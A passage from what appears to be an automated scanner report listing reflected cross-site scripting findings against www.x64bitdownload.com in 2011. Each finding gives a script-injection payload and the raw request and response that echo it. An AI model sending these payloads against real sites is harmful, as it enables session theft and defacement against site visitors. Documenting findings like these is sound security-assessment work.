Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22yenc%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22yenc%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49295


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/64-bit-yenc-downloads.html?bd8dd"><script>alert(1)</script>dc3655acae7=1" />
...[SNIP]...

4.1627. http://www.x64bitdownload.com/a-oz-insight-1768-downloads.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /a-oz-insight-1768-downloads.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97190"><script>alert(1)</script>9747501482a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /a-oz-insight-1768-downloads.html97190"><script>alert(1)</script>9747501482a HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:47:26 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:57:34 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 26073


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/a-oz-insight-1768-downloads.html97190"><script>alert(1)</script>9747501482a" />
...[SNIP]...

4.1628. http://www.x64bitdownload.com/a-oz-insight-1768-downloads.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /a-oz-insight-1768-downloads.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 654dd"><script>alert(1)</script>8885636ee6d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /a-oz-insight-1768-downloads.html?654dd"><script>alert(1)</script>8885636ee6d=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:44:36 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:54:40 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 26076


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/a-oz-insight-1768-downloads.html?654dd"><script>alert(1)</script>8885636ee6d=1" />
...[SNIP]...

4.1629. http://www.x64bitdownload.com/categories/free-64-bit-audio-multimedia-downloads-1-0-d.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-audio-multimedia-downloads-1-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2275c"><script>alert(1)</script>5b1950577da was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories2275c"><script>alert(1)</script>5b1950577da/free-64-bit-audio-multimedia-downloads-1-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:31:03 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21335

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categories2275c"><script>alert(1)</script>5b1950577da/free-64-bit-audio-multimedia-downloads-1-0-d.html" />
...[SNIP]...

4.1630. http://www.x64bitdownload.com/categories/free-64-bit-audio-multimedia-downloads-1-0-d.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-audio-multimedia-downloads-1-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93e79"><script>alert(1)</script>bc95b28f18 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-audio-multimedia-downloads-1-0-d.html93e79"><script>alert(1)</script>bc95b28f18 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:32:13 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:42:46 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%221%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 79681


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-audio-multimedia-downloads-1-0-d.html93e79"><script>alert(1)</script>bc95b28f18" />
...[SNIP]...

4.1631. http://www.x64bitdownload.com/categories/free-64-bit-audio-multimedia-downloads-1-0-d.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-audio-multimedia-downloads-1-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0caf"><script>alert(1)</script>6aa48f4bf87 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-audio-multimedia-downloads-1-0-d.html?b0caf"><script>alert(1)</script>6aa48f4bf87=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:26:29 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:36:44 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%221%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 79685


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-audio-multimedia-downloads-1-0-d.html?b0caf"><script>alert(1)</script>6aa48f4bf87=1" />
...[SNIP]...

4.1632. http://www.x64bitdownload.com/categories/free-64-bit-business-downloads-2-0-d.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-business-downloads-2-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cfa0d"><script>alert(1)</script>6f7a56462ad was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categoriescfa0d"><script>alert(1)</script>6f7a56462ad/free-64-bit-business-downloads-2-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:31:05 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21327

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categoriescfa0d"><script>alert(1)</script>6f7a56462ad/free-64-bit-business-downloads-2-0-d.html" />
...[SNIP]...

4.1633. http://www.x64bitdownload.com/categories/free-64-bit-business-downloads-2-0-d.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-business-downloads-2-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc60f"><script>alert(1)</script>60697c60e67 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-business-downloads-2-0-d.htmlbc60f"><script>alert(1)</script>60697c60e67 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:31:55 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:42:12 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%222%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 85699


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-business-downloads-2-0-d.htmlbc60f"><script>alert(1)</script>60697c60e67" />
...[SNIP]...

4.1634. http://www.x64bitdownload.com/categories/free-64-bit-business-downloads-2-0-d.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-business-downloads-2-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d41a"><script>alert(1)</script>99f91a14c93 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-business-downloads-2-0-d.html?6d41a"><script>alert(1)</script>99f91a14c93=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:27:02 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:37:33 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%222%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 85702


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-business-downloads-2-0-d.html?6d41a"><script>alert(1)</script>99f91a14c93=1" />
...[SNIP]...

4.1635. http://www.x64bitdownload.com/categories/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f845d"><script>alert(1)</script>ffca716742e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categoriesf845d"><script>alert(1)</script>ffca716742e/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:30:02 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21359

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categoriesf845d"><script>alert(1)</script>ffca716742e/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.html" />
...[SNIP]...

4.1636. http://www.x64bitdownload.com/categories/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2d3b"><script>alert(1)</script>93a1874d47f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.htmlb2d3b"><script>alert(1)</script>93a1874d47f HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:30:53 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:41:03 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2239%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 83164


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.htmlb2d3b"><script>alert(1)</script>93a1874d47f" />
...[SNIP]...

4.1637. http://www.x64bitdownload.com/categories/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fe46"><script>alert(1)</script>fbe8aea8d3a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.html?1fe46"><script>alert(1)</script>fbe8aea8d3a=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:26:53 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:36:54 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2239%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 83167


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-communications-chat-instant-messaging-downloads-3-39-0-d.html?1fe46"><script>alert(1)</script>fbe8aea8d3a=1" />
...[SNIP]...

4.1638. http://www.x64bitdownload.com/categories/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6340"><script>alert(1)</script>56e52f2f479 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categoriesc6340"><script>alert(1)</script>56e52f2f479/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:31:28 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21361

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categoriesc6340"><script>alert(1)</script>56e52f2f479/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html" />
...[SNIP]...

4.1639. http://www.x64bitdownload.com/categories/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36536"><script>alert(1)</script>62e91f4268d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html36536"><script>alert(1)</script>62e91f4268d HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:32:29 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:43:00 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2240%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 66969


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html36536"><script>alert(1)</script>62e91f4268d" />
...[SNIP]...

4.1640. http://www.x64bitdownload.com/categories/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 695c3"><script>alert(1)</script>3a42e06dc34 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html?695c3"><script>alert(1)</script>3a42e06dc34=1 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:28:28 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:38:31 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A4%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A14%3A%22subcategory_id%22%3Bs%3A2%3A%2240%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 66972


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
<input type="hidden" name="retpage" value="/categories/free-64-bit-communications-dial-up-connection-tools-downloads-3-40-0-d.html?695c3"><script>alert(1)</script>3a42e06dc34=1" />
...[SNIP]...

4.1641. http://www.x64bitdownload.com/categories/free-64-bit-communications-downloads-3-0-d.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-downloads-3-0-d.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4190"><script>alert(1)</script>b2c86d6f802 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categoriesa4190"><script>alert(1)</script>b2c86d6f802/free-64-bit-communications-downloads-3-0-d.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:30:59 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21333

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/categoriesa4190"><script>alert(1)</script>b2c86d6f802/free-64-bit-communications-downloads-3-0-d.html" />
...[SNIP]...

4.1642. http://www.x64bitdownload.com/categories/free-64-bit-communications-downloads-3-0-d.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /categories/free-64-bit-communications-downloads-3-0-d.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98438"><script>alert(1)</script>296e60cbefa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /categories/free-64-bit-communications-downloads-3-0-d.html98438"><script>alert(1)</script>296e60cbefa HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:32:01 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:42:09 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A1%3A%223%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 82513


